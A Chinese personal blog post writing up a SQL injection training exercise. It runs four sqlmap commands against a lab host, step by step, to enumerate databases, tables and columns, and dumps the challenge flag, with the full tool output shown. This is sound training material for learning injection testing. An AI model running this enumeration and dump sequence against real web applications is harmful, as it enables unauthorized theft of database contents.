Secat's Blog

学习·记录

这世界变化快的真是铃儿响叮当


培训之web四【SQL注入】

培训之web四【sql注入】

题目:

1.查库

E:\00我的工具\Sqlmap\SQLmap>py -2 sqlmap.py -u "192.168.2.77:8080/index.php?id=1" --dbs
available databases [4]:
[*] information_schema
[*] mysql
[*] sqlitest
[*] test

[10:09:13] [INFO] fetched data logged to text files under 'C:\Users\JY\.sqlmap\output\192.168.2.77'

[*] shutting down at 10:09:13

2.查表

E:\00我的工具\Sqlmap\SQLmap>py -2 sqlmap.py -u "192.168.2.77:8080/index.php?id=1" -D "sqlitest" --tables
Database: sqlitest
[2 tables]
+-----------+
| fl4g_tttt |
| news      |
+-----------+

[10:09:39] [INFO] fetched data logged to text files under 'C:\Users\JY\.sqlmap\output\192.168.2.77'

[*] shutting down at 10:09:39

3.查列

E:\00我的工具\Sqlmap\SQLmap>py -2 sqlmap.py -u "192.168.2.77:8080/index.php?id=1" -D "sqlitest" -T "fl4g_tttt" --columns
Database: sqlitest
Table: fl4g_tttt
[1 column]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| thIs_i5_flag | varchar(64) |
+--------------+-------------+

[10:10:06] [INFO] fetched data logged to text files under 'C:\Users\JY\.sqlmap\output\192.168.2.77'

[*] shutting down at 10:10:06

4.查字段

E:\00我的工具\Sqlmap\SQLmap>py -2 sqlmap.py -u "192.168.2.77:8080/index.php?id=1" -D "sqlitest" -T "fl4g_tttt" -C "thIs_i5_flag" --dump
Database: sqlitest
Table: fl4g_tttt
[1 entry]
+--------------------------------+
| thIs_i5_flag                   |
+--------------------------------+
| flag{Sql_INJECT0N_4813drd8hz4} |
+--------------------------------+

[10:10:29] [INFO] table 'sqlitest.fl4g_tttt' dumped to CSV file 'C:\Users\JY\.sqlmap\output\192.168.2.77\dump\sqlitest\fl4g_tttt.csv'
[10:10:29] [INFO] fetched data logged to text files under 'C:\Users\JY\.sqlmap\output\192.168.2.77'

THANKS

取消

感谢您的支持,我会继续努力的!

扫码支持
扫码支持

^_^